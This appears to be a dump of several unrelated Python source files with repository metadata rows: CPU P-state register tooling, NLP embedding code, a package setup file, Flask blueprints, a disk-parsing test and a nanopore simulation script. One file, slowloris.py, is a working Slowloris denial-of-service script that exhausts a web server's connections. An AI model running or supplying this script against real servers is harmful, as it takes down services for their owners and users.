print('P' + str(p) + " - " + pstate2str(readmsr(pstates[p])))
print('C6 State - Package - ' + ('Enabled' if readmsr(0xC0010292) & (1 << 32) else 'Disabled'))
print('C6 State - Core - ' + ('Enabled' if readmsr(0xC0010296) & ((1 << 22) | (1 << 14) | (1 << 6)) == ((1 << 22) | (1 << 14) | (1 << 6)) else 'Disabled'))
if args.pstate >= 0:
new = old = readmsr(pstates[args.pstate])
print('Current P' + str(args.pstate) + ': ' + pstate2str(old))
if args.enable:
new = setbits(new, 63, 1, 1)
print('Enabling state')
if args.disable:
new = setbits(new, 63, 1, 0)
print('Disabling state')
if args.fid >= 0:
new = setfid(new, args.fid)
print('Setting FID to %X' % args.fid)
if args.did >= 0:
new = setdid(new, args.did)
print('Setting DID to %X' % args.did)
if args.vid >= 0:
new = setvid(new, args.vid)
print('Setting VID to %X' % args.vid)
if new != old:
if not (readmsr(0xC0010015) & (1 << 21)):
print('Locking TSC frequency')
for c in range(len(glob.glob('/dev/cpu/[0-9]*/msr'))):
writemsr(0xC0010015, readmsr(0xC0010015, c) | (1 << 21), c)
print('New P' + str(args.pstate) + ': ' + pstate2str(new))
writemsr(pstates[args.pstate], new)
if args.c6_enable:
writemsr(0xC0010292, readmsr(0xC0010292) | (1 << 32))
writemsr(0xC0010296, readmsr(0xC0010296) | ((1 << 22) | (1 << 14) | (1 << 6)))
print('Enabling C6 state')
if args.c6_disable:
writemsr(0xC0010292, readmsr(0xC0010292) & ~(1 << 32))
writemsr(0xC0010296, readmsr(0xC0010296) & ~((1 << 22) | (1 << 14) | (1 << 6)))
print('Disabling C6 state')
if not args.list and args.pstate == -1 and not args.c6_enable and not args.c6_disable:
parser.print_help()
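# Typical invocations (reading/writing MSRs needs root and the msr kernel module):
#   sudo modprobe msr
#   sudo ./zenstates.py --list                  # show all P-states and C6 status
#   sudo ./zenstates.py -p 0 -f 88 -d 8 -v 38   # reprogram P0 (FID/DID/VID in hex)
#   sudo ./zenstates.py --c6-disable            # disable the C6 C-state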
| 37.322034
| 159
| 0.572888
|
00777cd004f8fa750146dd87dceb0288d99e1c43
| 3,149
|
py
|
Python
|
allennlp/modules/token_embedders/bag_of_word_counts_token_embedder.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | null | null | null |
allennlp/modules/token_embedders/bag_of_word_counts_token_embedder.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | null | null | null |
allennlp/modules/token_embedders/bag_of_word_counts_token_embedder.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | 2
|
2019-12-21T05:58:44.000Z
|
2021-08-16T07:41:21.000Z
|
import torch
from allennlp.common.checks import ConfigurationError
from allennlp.data import Vocabulary
from allennlp.modules.token_embedders.token_embedder import TokenEmbedder
from allennlp.nn.util import get_text_field_mask
@TokenEmbedder.register("bag_of_word_counts")
class BagOfWordCountsTokenEmbedder(TokenEmbedder):
"""
Represents a sequence of tokens as a bag of (discrete) word ids, as it was done
in the pre-neural days.
Each sequence gets a vector of length vocabulary size, where the i'th entry in the vector
corresponds to the number of times the i'th token in the vocabulary appears in the sequence.
By default, we ignore padding tokens.
# Parameters
vocab : `Vocabulary`
vocab_namespace : `str`, optional (default = "tokens")
namespace of vocabulary to embed
projection_dim : `int`, optional (default = `None`)
if specified, will project the resulting bag of words representation
to specified dimension.
ignore_oov : `bool`, optional (default = `False`)
If true, we ignore the OOV token.
"""
def __init__(
self,
vocab: Vocabulary,
vocab_namespace: str = "tokens",
projection_dim: int = None,
ignore_oov: bool = False,
) -> None:
super().__init__()
self.vocab = vocab
self.vocab_size = vocab.get_vocab_size(vocab_namespace)
if projection_dim:
self._projection = torch.nn.Linear(self.vocab_size, projection_dim)
else:
self._projection = None
self._ignore_oov = ignore_oov
oov_token = vocab._oov_token
self._oov_idx = vocab.get_token_to_index_vocabulary(vocab_namespace).get(oov_token)
if self._oov_idx is None:
raise ConfigurationError(
"OOV token does not exist in vocabulary namespace {}".format(vocab_namespace)
)
self.output_dim = projection_dim or self.vocab_size
def get_output_dim(self):
return self.output_dim
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
"""
# Parameters
inputs : `torch.Tensor`
Shape `(batch_size, timesteps, sequence_length)` of word ids
representing the current batch.
# Returns
The bag-of-words representations for the input sequence, shape
`(batch_size, vocab_size)`
"""
bag_of_words_vectors = []
mask = get_text_field_mask({"tokens": {"tokens": inputs}})
if self._ignore_oov:
# also mask out positions corresponding to oov
mask &= inputs != self._oov_idx
for document, doc_mask in zip(inputs, mask):
document = torch.masked_select(document, doc_mask)
vec = torch.bincount(document, minlength=self.vocab_size).float()
vec = vec.view(1, -1)
bag_of_words_vectors.append(vec)
bag_of_words_output = torch.cat(bag_of_words_vectors, 0)
if self._projection:
projection = self._projection
bag_of_words_output = projection(bag_of_words_output)
return bag_of_words_output
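# Toy illustration of the counting step above (a sketch; index 0 is AllenNLP's
# default padding index):
#   inputs = torch.tensor([[2, 3, 3, 0]])   # one document with one padded position
#   # with vocab_size = 5 and padding masked out, torch.bincount yields
#   # tensor([0., 0., 1., 2., 0.]) -- token 2 appears once, token 3 twice.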
| 35.784091
| 93
| 0.659574
|
e10730a2198aaf131381c727754c5d312b1bb97a
| 4,082
|
py
|
Python
|
vectors.py
|
shivam13verma/judge-embeddings
|
9b861319a1240529d25c15799952e32dde2e894e
|
[
"MIT"
] | null | null | null |
vectors.py
|
shivam13verma/judge-embeddings
|
9b861319a1240529d25c15799952e32dde2e894e
|
[
"MIT"
] | null | null | null |
vectors.py
|
shivam13verma/judge-embeddings
|
9b861319a1240529d25c15799952e32dde2e894e
|
[
"MIT"
] | null | null | null |
import locale
import glob
import os
import os.path
import requests
import tarfile
import sys
import re
import gensim
from gensim.models.doc2vec import TaggedDocument
from collections import namedtuple
from gensim.models import Doc2Vec
import gensim.models.doc2vec
from collections import OrderedDict
import multiprocessing
from gensim.test.test_doc2vec import ConcatenatedDoc2Vec
import pickle
reload(sys)
sys.setdefaultencoding("utf-8")
dirname = '/scratch/ap4608/judge_data'
locale.setlocale(locale.LC_ALL, 'C')
# Convert text to lower-case and strip punctuation/symbols from words
def normalize_text(text):
norm_text = text.lower()
# Replace breaks with spaces
norm_text = norm_text.replace('<br />', ' ')
# Pad punctuation with spaces on both sides
for char in ['.', '"', ',', '(', ')', '!', '?', ';', ':']:
norm_text = norm_text.replace(char, ' ' + char + ' ')
return norm_text
# Concat and normalize test/train data
folders = os.listdir(dirname)
alldata = ''
for fol in folders:
temp = ''
output = fol.replace('/', '-') + '.txt'
# Is there a better pattern to use?
txt_files = glob.glob('/'.join([dirname, fol, '*.txt']))
for txt in txt_files:
with open(txt, 'r') as t:
control_chars = [chr(0x85)]
t_clean = t.read()
t_clean = t_clean.replace('\n', ' ')
t_clean = re.sub(r'[^\x00-\x7F]+',' ', t_clean)
for c in control_chars:
t_clean = t_clean.replace(c, ' ')
temp += t_clean
temp += "\n"
temp_norm = normalize_text(temp)
if len(temp_norm) == 1:
continue
with open('/'.join([dirname, output]), 'w') as n:
n.write(temp_norm)
alldata += temp_norm
with open('/'.join([dirname, 'alldata-id.txt']), 'w') as f:
for idx, line in enumerate(alldata.splitlines()):
num_line = "_*{0} {1}\n".format(idx, line)
f.write(num_line)
SentimentDocument = namedtuple('SentimentDocument', 'words tags split sentiment')
alldocs = [] # will hold all docs in original order
with open(os.path.join(dirname, 'alldata-id.txt')) as alldata:
for line_no, line in enumerate(alldata):
tokens = gensim.utils.to_unicode(line).split()
words = tokens[1:]
tags = [line_no] # `tags = [tokens[0]]` would also work at extra memory cost
split = ['train','test','extra','extra'][line_no//25000] # 25k train, 25k test, 25k extra
sentiment = [1.0, 0.0, 1.0, 0.0, None, None, None, None][line_no//12500] # [12.5K pos, 12.5K neg]*2 then unknown
alldocs.append(SentimentDocument(words, tags, split, sentiment))
train_docs = [doc for doc in alldocs if doc.split == 'train']
test_docs = [doc for doc in alldocs if doc.split == 'test']
doc_list = alldocs[:] # for reshuffling per pass
cores = multiprocessing.cpu_count()
assert gensim.models.doc2vec.FAST_VERSION > -1, "this will be painfully slow otherwise"
simple_models = [
# PV-DM w/concatenation - window=5 (both sides) approximates paper's 10-word total window size
Doc2Vec(dm=1, dm_concat=1, size=100, window=5, negative=5, hs=0, min_count=2, workers=cores),
# PV-DBOW
Doc2Vec(dm=0, size=100, negative=5, hs=0, min_count=2, workers=cores),
# PV-DM w/average
Doc2Vec(dm=1, dm_mean=1, size=100, window=10, negative=5, hs=0, min_count=2, workers=cores),
]
# speed setup by sharing results of 1st model's vocabulary scan
simple_models[0].build_vocab(alldocs) # PV-DM/concat requires one special NULL word so it serves as template
for model in simple_models[1:]:
model.reset_from(simple_models[0])
models_by_name = OrderedDict((str(model), model) for model in simple_models)
models_by_name['dbow+dmm'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[2]])
models_by_name['dbow+dmc'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[0]])
# Create a document vector list and save it
doc_vec_list = [x.docvecs for x in simple_models]
pickle.dump(doc_vec_list, open('docvecs.p', 'wb'))
# pickle.dump(models_by_name, open('model.p', 'wb'))
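# To embed a previously unseen document with one of the trained models, one would
# typically use Doc2Vec.infer_vector (sketch; the text below is a placeholder):
#   tokens = normalize_text("some new judgment text").split()
#   new_vec = simple_models[1].infer_vector(tokens)  # 100-dim PV-DBOW vector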
| 31.4
| 120
| 0.66879
|
eef3daed8ab45777b3b7b176edfb2f44810328d9
| 1,883
|
py
|
Python
|
setup.py
|
kalyan1179/Automate-WhatsApp-Messages-with-Python
|
aaf4c46be1fa57776dcd2014fa5293e564a2ea4a
|
[
"MIT"
] | null | null | null |
setup.py
|
kalyan1179/Automate-WhatsApp-Messages-with-Python
|
aaf4c46be1fa57776dcd2014fa5293e564a2ea4a
|
[
"MIT"
] | null | null | null |
setup.py
|
kalyan1179/Automate-WhatsApp-Messages-with-Python
|
aaf4c46be1fa57776dcd2014fa5293e564a2ea4a
|
[
"MIT"
] | null | null | null |
from distutils.core import setup
setup(
name = 'pyAWM', # How you named your package folder (MyLib)
packages = ['pyAWM'],   # Choose the same as "name"
# package_dir={'': 'C:/Users/aswanth kumar/Desktop'},
version = '1.0.1', # Start with a small number and increase it with every change you make
license='MIT',        # Choose a license from here: https://help.github.com/articles/licensing-a-repository
description = 'This library automates your whatsapp messages, files, media. It Schedules your messages at given time', # Give a short description about your library
author = 'Kalyan Pavan Latchipatruni', # Type in your name
author_email = 'kaluyanpavan1179@gmail.com', # Type in your E-Mail
url = 'https://github.com/kalyan1179/Automate-WhatsApp-Messages-with-Python', # Provide either the link to your github or to your website
download_url = 'https://github.com/kalyan1179/Automate-WhatsApp-Messages-with-Python/archive/1.0.1.tar.gz', # I explain this later on
keywords = ['WHATSAPP', 'AUTOMATE', 'MESSAGE', 'AUTOMATION', 'SEND'], # Keywords that define your package best
install_requires=[ # I get to this in a second
'selenium',
],
classifiers=[
'Development Status :: 3 - Alpha',      # Choose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
'Programming Language :: Python :: 3',      #Specify which Python versions you want to support
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
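# Typical release workflow for a setup.py like this (standard setuptools/twine
# commands, not specific to this package):
#   python setup.py sdist
#   twine upload dist/*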
| 64.931034
| 169
| 0.660117
|
45e36c19cad5c3fed20b61a6aa38b81392364cb4
| 135
|
py
|
Python
|
loga/__init__.py
|
hukkin/loga
|
5c10de42a13f8611ee84ca22122f71dbd2a27df4
|
[
"MIT"
] | 1
|
2021-04-23T17:11:25.000Z
|
2021-04-23T17:11:25.000Z
|
loga/__init__.py
|
hukkin/loga
|
5c10de42a13f8611ee84ca22122f71dbd2a27df4
|
[
"MIT"
] | 2
|
2021-07-12T22:22:08.000Z
|
2021-07-19T20:53:24.000Z
|
loga/__init__.py
|
hukkinj1/loga
|
5c10de42a13f8611ee84ca22122f71dbd2a27df4
|
[
"MIT"
] | null | null | null |
__version__ = "1.0.0" # DO NOT EDIT THIS LINE MANUALLY. LET bump2version UTILITY DO IT
from ._loga import Loga as Loga # noqa: F401
| 33.75
| 87
| 0.725926
|
09d8391fef11c2c147f17b59f71e7f2089fca844
| 569
|
py
|
Python
|
blueprints/api/receitas/blueprint.py
|
maiconandsilva/receitas
|
924aa3acbd5b24286fb2a0527c2a2e133f904937
|
[
"MIT"
] | null | null | null |
blueprints/api/receitas/blueprint.py
|
maiconandsilva/receitas
|
924aa3acbd5b24286fb2a0527c2a2e133f904937
|
[
"MIT"
] | null | null | null |
blueprints/api/receitas/blueprint.py
|
maiconandsilva/receitas
|
924aa3acbd5b24286fb2a0527c2a2e133f904937
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
bp_receitas = Blueprint('receitas', __name__, url_prefix='/receitas')
bp_categorias = Blueprint('categorias', __name__, url_prefix='/categorias')
bp_ingredientes = Blueprint('ingredientes', __name__, url_prefix='/ingredientes')
bp_unidades_medida = Blueprint('unidades_medida', __name__,
url_prefix='/unidades-de-medida')
# Register the blueprints as nested sub-routes
bp_receitas.register_blueprint(bp_categorias)
bp_receitas.register_blueprint(bp_ingredientes)
bp_ingredientes.register_blueprint(bp_unidades_medida)
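# Sketch of how these nested blueprints would be attached to an application
# (the create_app factory is illustrative, not part of this module):
#
#   from flask import Flask
#
#   def create_app():
#       app = Flask(__name__)
#       app.register_blueprint(bp_receitas)
#       # exposes /receitas, /receitas/categorias,
#       # /receitas/ingredientes/unidades-de-medida, ...
#       return app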
| 40.642857
| 81
| 0.785589
|
73a62bdf477587e54509ce7621fd7adf1a387639
| 7,402
|
py
|
Python
|
pythainlp/ulmfit/core.py
|
wasdee/pythainlp
|
9e97321aebc104cb260f801e3b983c937f31ae01
|
[
"Apache-2.0"
] | 1
|
2021-01-13T17:59:55.000Z
|
2021-01-13T17:59:55.000Z
|
pythainlp/ulmfit/core.py
|
prrssr/pythainlp
|
19ff3510a73dd93515fcc1b4485326a8b7172026
|
[
"Apache-2.0"
] | null | null | null |
pythainlp/ulmfit/core.py
|
prrssr/pythainlp
|
19ff3510a73dd93515fcc1b4485326a8b7172026
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Universal Language Model Fine-tuning for Text Classification (ULMFiT).
"""
import collections
from typing import Callable, Collection
import numpy as np
import torch
from pythainlp.corpus import get_corpus_path
from pythainlp.tokenize import THAI2FIT_TOKENIZER
from pythainlp.ulmfit.preprocess import (
fix_html,
lowercase_all,
remove_space,
replace_rep_after,
replace_rep_nonum,
replace_url,
replace_wrep_post,
replace_wrep_post_nonum,
rm_brackets,
rm_useless_newlines,
rm_useless_spaces,
spec_add_spaces,
ungroup_emoji,
)
from pythainlp.util import reorder_vowels
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
_MODEL_NAME_LSTM = "wiki_lm_lstm"
_ITOS_NAME_LSTM = "wiki_itos_lstm"
# Pretrained model paths
THWIKI_LSTM = dict(
wgts_fname=get_corpus_path(_MODEL_NAME_LSTM),
itos_fname=get_corpus_path(_ITOS_NAME_LSTM),
)
# Preprocessing rules for Thai text
# dense features
pre_rules_th = [
replace_rep_after,
fix_html,
reorder_vowels,
spec_add_spaces,
rm_useless_spaces,
rm_useless_newlines,
rm_brackets,
replace_url,
]
post_rules_th = [replace_wrep_post, ungroup_emoji, lowercase_all]
# sparse features
pre_rules_th_sparse = pre_rules_th[1:] + [replace_rep_nonum]
post_rules_th_sparse = post_rules_th[1:] + [
replace_wrep_post_nonum,
remove_space,
]
def process_thai(
text: str,
pre_rules: Collection = pre_rules_th_sparse,
tok_func: Callable = THAI2FIT_TOKENIZER.word_tokenize,
post_rules: Collection = post_rules_th_sparse,
) -> Collection[str]:
"""
Process Thai texts for models (with sparse features as default)
:param str text: text to be cleaned
:param list[func] pre_rules: rules to apply before tokenization.
:param func tok_func: tokenization function (by default, **tok_func** is
:func:`pythainlp.tokenize.word_tokenize`)
:param list[func] post_rules: rules to apply after tokenizations
:return: a list of cleaned tokenized texts
:rtype: list[str]
:Note:
- The default **pre-rules** consists of :func:`fix_html`,
:func:`pythainlp.util.normalize`,
:func:`spec_add_spaces`,
:func:`rm_useless_spaces`,
:func:`rm_useless_newlines`,
:func:`rm_brackets`
and :func:`replace_rep_nonum`.
- The default **post-rules** consists of :func:`ungroup_emoji`,
:func:`lowercase_all`, :func:`replace_wrep_post_nonum`,
and :func:`remove_space`.
:Example:
1. Use default pre-rules and post-rules:
>>> from pythainlp.ulmfit import process_thai
>>> text = "บ้านนนนน () อยู่นานนานนาน 😂🤣😃😄😅 PyThaiNLP amp; "
>>> process_thai(text)
['บ้าน', 'xxrep', ' ', 'อยู่', 'xxwrep', 'นาน', '😂', '🤣',
'😃', '😄', '😅', 'pythainlp', '&']
2. Modify pre_rules and post_rules arguments with
rules provided in :mod:`pythainlp.ulmfit`:
>>> from pythainlp.ulmfit import (
process_thai,
replace_rep_after,
fix_html,
ungroup_emoji,
replace_wrep_post,
remove_space)
>>>
>>> text = "บ้านนนนน () อยู่นานนานนาน 😂🤣😃😄😅 PyThaiNLP amp; "
>>> process_thai(text,
pre_rules=[replace_rep_after, fix_html],
post_rules=[ungroup_emoji,
replace_wrep_post,
remove_space]
)
['บ้าน', 'xxrep', '5', '()', 'อยู่', 'xxwrep', '2', 'นาน', '😂', '🤣',
'😃', '😄', '😅', 'PyThaiNLP', '&']
"""
res = text
for rule in pre_rules:
res = rule(res)
res = tok_func(res)
for rule in post_rules:
res = rule(res)
return res
def document_vector(text: str, learn, data, agg: str = "mean"):
"""
This function vectorizes Thai input text into a 400-dimensional vector using
:class:`fastai` language model and data bunch.
:meth: `document_vector` gets a document vector using a fastai language model
and data bunch
:param str text: text to be vectorized with :class:`fastai` language model.
:param learn: :class:`fastai` language model learner
:param data: :class:`fastai` data bunch
:param str agg: name of aggregation methods for word embeddings
The available methods are "mean" and "sum"
:return: :class:`numpy.array` of document vector sized 400 based on
the encoder of the model
:rtype: :class:`numpy.ndarray((1, 400))`
:Example:
>>> from pythainlp.ulmfit import document_vector
>>> from fastai import *
>>> from fastai.text import *
>>>
>>> # Load Data Bunch
>>> data = load_data(MODEL_PATH, 'thwiki_lm_data.pkl')
>>>
>>> # Initialize language_model_learner
>>> config = dict(emb_sz=400, n_hid=1550, n_layers=4, pad_token=1,
qrnn=False, tie_weights=True, out_bias=True, output_p=0.25,
hidden_p=0.1, input_p=0.2, embed_p=0.02, weight_p=0.15)
>>> trn_args = dict(drop_mult=0.9, clip=0.12, alpha=2, beta=1)
>>> learn = language_model_learner(data, AWD_LSTM, config=config,
pretrained=False, **trn_args)
>>> document_vector('วันนี้วันดีปีใหม่', learn, data)
:See Also:
* A notebook showing how to train `ulmfit` language model and its
usage, `Jupyter Notebook \
<https://github.com/cstorm125/thai2fit/blob/master/thwiki_lm/word2vec_examples.ipynb>`_
"""
s = THAI2FIT_TOKENIZER.word_tokenize(text)
t = torch.tensor(data.vocab.numericalize(s), requires_grad=False).to(
device
)
m = learn.model[0].encoder.to(device)
res = m(t).cpu().detach().numpy()
if agg == "mean":
res = res.mean(0)
elif agg == "sum":
res = res.sum(0)
else:
raise ValueError("Aggregate by mean or sum")
return res
def merge_wgts(em_sz, wgts, itos_pre, itos_new):
"""
This function is to insert new vocab into an existing model named `wgts`
and update the model's weights for new vocab with the average embedding.
:meth: `merge_wgts` inserts pretrained weights and vocab into a new set
of weights and vocab; the average embedding is used for vocab not in the pretrained vocab
:param int em_sz: embedding size
:param wgts: torch model weights
:param list itos_pre: pretrained list of vocab
:param list itos_new: list of new vocab
:return: merged torch model weights
"""
vocab_size = len(itos_new)
enc_wgts = wgts["0.encoder.weight"].numpy()
# Average weight of encoding
row_m = enc_wgts.mean(0)
stoi_pre = collections.defaultdict(
lambda: -1, {v: k for k, v in enumerate(itos_pre)}
)
# New embedding based on classification dataset
new_w = np.zeros((vocab_size, em_sz), dtype=np.float32)
for i, w in enumerate(itos_new):
r = stoi_pre[w]
# Use pretrained embedding if present; else use the average
new_w[i] = enc_wgts[r] if r >= 0 else row_m
wgts["0.encoder.weight"] = torch.tensor(new_w)
wgts["0.encoder_dp.emb.weight"] = torch.tensor(np.copy(new_w))
wgts["1.decoder.weight"] = torch.tensor(np.copy(new_w))
return wgts
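# Worked example of the merge rule above: with itos_pre = ['the', 'cat'] and
# itos_new = ['cat', 'dog'], the row for 'cat' is copied straight from the
# pretrained encoder weights, while 'dog' (stoi_pre['dog'] == -1, i.e. absent
# from the pretrained vocab) receives row_m, the mean of all pretrained rows.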
| 31.632479
| 97
| 0.630775
|
56f174adde895a512b0ba5286ab22010776c0838
| 1,561
|
py
|
Python
|
python_attacks/slowloris.py
|
mfranceschi/psat-crisis-management
|
c6b4d65720b7820e179336b6e28332502cd54cb1
|
[
"MIT"
] | null | null | null |
python_attacks/slowloris.py
|
mfranceschi/psat-crisis-management
|
c6b4d65720b7820e179336b6e28332502cd54cb1
|
[
"MIT"
] | null | null | null |
python_attacks/slowloris.py
|
mfranceschi/psat-crisis-management
|
c6b4d65720b7820e179336b6e28332502cd54cb1
|
[
"MIT"
] | null | null | null |
import socket, random, time
# Source: https://github.com/adrianchifor/pyslowloris
headers = [
"User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Accept-language: en-US,en"
]
sockets = []
def setupSocket(ip):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((ip, 80))
sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 1337)).encode("utf-8"))
for header in headers:
sock.send("{}\r\n".format(header).encode("utf-8"))
return sock
def run_slow_loris(ip: str, nb_sockets: int=500):
print("Starting DoS attack on {}. Connecting to {} sockets.".format(ip, nb_sockets))
for _ in range(nb_sockets):
try:
print("Socket {}".format(_))
sock = setupSocket(ip)
except socket.error:
break
sockets.append(sock)
while True:
print("Connected to {} sockets. Sending headers...".format(len(sockets)))
for sock in list(sockets):
try:
sock.send("X-a: {}\r\n".format(random.randint(1, 4600)).encode("utf-8"))
except socket.error:
sockets.remove(sock)
for _ in range(nb_sockets - len(sockets)):
print("Re-opening closed sockets...")
try:
sock = setupSocket(ip)
if sock:
sockets.append(sock)
except socket.error:
break
time.sleep(15)
| 28.907407
| 139
| 0.577194
|
d54269a690ac2cacf02a36e04017a71d95301f8d
| 2,627
|
py
|
Python
|
tests/mac/macdisk/test_representing_internal_corestorage_volume.py
|
Abd-Elrazek/InQRy
|
ab9d19a737a41673e8dcc419d49ca0e96476d560
|
[
"MIT"
] | 37
|
2017-05-12T02:32:26.000Z
|
2019-05-03T14:43:08.000Z
|
tests/mac/macdisk/test_representing_internal_corestorage_volume.py
|
Abd-Elrazek/InQRy
|
ab9d19a737a41673e8dcc419d49ca0e96476d560
|
[
"MIT"
] | 11
|
2017-08-27T03:36:18.000Z
|
2018-10-28T01:31:12.000Z
|
tests/mac/macdisk/test_representing_internal_corestorage_volume.py
|
Abd-Elrazek/InQRy
|
ab9d19a737a41673e8dcc419d49ca0e96476d560
|
[
"MIT"
] | 15
|
2019-06-13T11:29:12.000Z
|
2022-02-28T06:40:14.000Z
|
from inqry.system_specs import macdisk
DISKUTIL_OUTPUT = ''' Device Identifier: disk1
Device Node: /dev/disk1
Whole: Yes
Part of Whole: disk1
Device / Media Name: APPLE SSD AP0256J
Volume Name: Macintosh HD
Mounted: Yes
Mount Point: /
Content (IOContent): Apple_HFS
File System Personality: Journaled HFS+
Type (Bundle): hfs
Name (User Visible): Mac OS Extended (Journaled)
Journal: Journal size 24576 KB at offset 0xfa0000
Owners: Enabled
OS Can Be Installed: Yes
Recovery Disk: disk0s3
Media Type: Generic
Protocol: PCI-Express
SMART Status: Not Supported
Volume UUID: BFDDBF0E-8AAC-30F3-9D51-FD9FB55A8324
Disk / Partition UUID: FE0F6BFA-AC2D-4395-B3B2-64C57F379F67
Disk Size: 249.7 GB (249664372736 Bytes) (exactly 487625728 512-Byte-Units)
Device Block Size: 4096 Bytes
Volume Total Space: 249.7 GB (249664372736 Bytes) (exactly 487625728 512-Byte-Units)
Volume Used Space: 193.8 GB (193815617536 Bytes) (exactly 378546128 512-Byte-Units) (77.6%)
Volume Available Space: 55.8 GB (55848755200 Bytes) (exactly 109079600 512-Byte-Units) (22.4%)
Allocation Block Size: 4096 Bytes
Read-Only Media: No
Read-Only Volume: No
Device Location: Internal
Removable Media: Fixed
Solid State: Yes
Virtual: Yes
OS 9 Drivers: No
Low Level Format: Not supported
This disk is a Core Storage Logical Volume (LV). Core Storage Information:
LV UUID: FE0F6BFA-AC2D-4395-B3B2-64C57F379F67
LVF UUID: DA6A0D85-F308-41D5-95BA-9774B0A3A713
LVG UUID: 14494031-E586-49C0-8A48-BEBDAFF2548A
PV UUID (disk): F93B31BC-3637-4AA6-8E28-441F155E687C (disk0s2)
Fusion Drive: No
Encrypted: No
'''
test_disk = macdisk.create_from_diskutil_output(DISKUTIL_OUTPUT)
def test_disk_is_internal():
assert test_disk.is_internal
def test_disk_is_virtual():
assert test_disk.is_virtual()
def test_device_name_is_correct():
assert test_disk.device_name == 'APPLE SSD AP0256J'
def test_disk_is_ssd():
assert test_disk.is_ssd
def test_size_is_correct():
assert test_disk.size == '249.7 GB'
def test_removable_media():
assert test_disk.removable_media == 'Fixed'
| 32.432099
| 101
| 0.610582
|
5bd9458dbc14d8863a84699e77eb0680609ee6f4
| 6,968
|
py
|
Python
|
nanopores/scripts/calculate_forces.py
|
jhwnkim/nanopores
|
98b3dbb5d36464fbdc03f59d224d38e4255324ce
|
[
"MIT"
] | 8
|
2016-09-07T01:59:31.000Z
|
2021-03-06T12:14:31.000Z
|
nanopores/scripts/calculate_forces.py
|
jhwnkim/nanopores
|
98b3dbb5d36464fbdc03f59d224d38e4255324ce
|
[
"MIT"
] | null | null | null |
nanopores/scripts/calculate_forces.py
|
jhwnkim/nanopores
|
98b3dbb5d36464fbdc03f59d224d38e4255324ce
|
[
"MIT"
] | 4
|
2017-12-06T17:43:01.000Z
|
2020-05-01T05:41:14.000Z
|
''' calculate forces on molecule depending on midpoint '''
#from petsc4py import PETSc
#from mpi4py import MPI
#comm = PETSc.Comm(MPI.COMM_SELF)
from nanopores import *
from dolfin import *
comm = mpi_comm_self()
import sys, argparse, math, os, mpi4py
# general parameters
r = 0.55 # [nm]
q = -2. # [q*C]
dnaqsdamp = 0.1
bV0 = 0.01
z = 7.5 # [nm]
newtondamp = 1.0
new_mesh = True
# geo parameters 3D
geo_name = "H_cyl_geo"
nm = import_vars("nanopores.geometries.%s.params_geo" %geo_name)["nm"]
params = dict(
rMolecule = 0.55*nm,
#moleculeblayer = True,
)
# geo parameters 2D
geo_name2D = "H_geo"
nm = 1e-9
params2D = dict(
rMolecule = 0.55*nm,
moleculeblayer = True,
boxfields = True,
)
# physical parameters (2D + 3D)
phys_params = dict(
Membraneqs = -0.,
#bV = 0.01,
Qmol = q*qq,
bulkcon = 3e2,
#uppermbias = 1.,
#lowermbias = -.02,
dnaqsdamp = dnaqsdamp,
couplebVtoQmol = True,
bV0 = bV0,
)
IllposedNonlinearSolver.newtondamp = newtondamp
#set_log_level(PROGRESS)
# solver parameters 3D
default_maxcells = 16e4
PNPS.imax = 50
PNPS.tolnewton = 1e0
#PNPProblem.method["kparams"]["monitor_convergence"] = True
PNPProblem.method["kparams"]["maximum_iterations"] = 600
#PNPProblem.method["kparams"]["error_on_nonconvergence"] = False
#PNPProblem.method["iterative"] = False
PNPProblem.method["kparams"]["absolute_tolerance"] = PNPS.tolnewton*1e-3
PNPProblem.method["kparams"]["relative_tolerance"] = 1e-8
StokesProblemEqualOrder.method["iterative"] = False
StokesProblemEqualOrder.method["kparams"]["absolute_tolerance"] = PNPS.tolnewton*1e-3
#StokesProblemEqualOrder.method["kparams"]["monitor_convergence"] = True
#LinearPBProblem.method["kparams"]["monitor_convergence"] = True
PoissonProblem.method["kparams"]["relative_tolerance"] = 1e-6
LinearPBProblem.method["kparams"]["relative_tolerance"] = 1e-6
# solver parameters 2D
default_maxcells2D = 12e4
PNPSAxisym.tolnewton = 1e0
def calculate_forces(x0, pid="", clscale=10.0, refinement=True, maxcells=default_maxcells):
''' calculate forces on molecule depending on midpoint '''
t = Timer("Mesh Generation")
generate_mesh(clscale, geo_name, pid=pid, x0=x0, **params)
meshfile = "/".join([DATADIR, geo_name, "mesh", "mesh%s.xml" %pid])
geo = geo_from_name(geo_name, mesh=Mesh(meshfile), x0=x0, **params)
phys = Physics("pore_molecule", geo, **phys_params)
print "CPU Time (mesh generation):",t.stop()
print "hmin:", geo.mesh.hmin()
t = Timer('PB')
goal = lambda v : phys.Fbare(v, 2) + phys.CurrentPB(v)
pb = LinearPBGoalOriented(geo, phys, goal=goal)
pb.maxcells = maxcells
pb.marking_fraction = 0.2
pb.solve(refinement=refinement)
print "CPU Time (PB):",t.stop()
t = Timer('PNPS')
geo = pb.geo
v0 = pb.solution
#pb.visualize("solid")
pnps = PNPS(geo, phys, v0=v0)
#pnps = PNPS(geo, phys)
i = pnps.solve(visualize=False)
while i==50:
print "\nRestarting Newton iteration!"
pnps.__init__(geo, phys)
pnps.solvers["PNP"].newtondamp *= 0.8
i = pnps.solve()
print "Newton iterations:",i
print "CPU Time (PNPS):",t.stop()
pnps.print_results()
f = pnps.get_functionals()
if any(math.isnan(f[s]) for s in f):
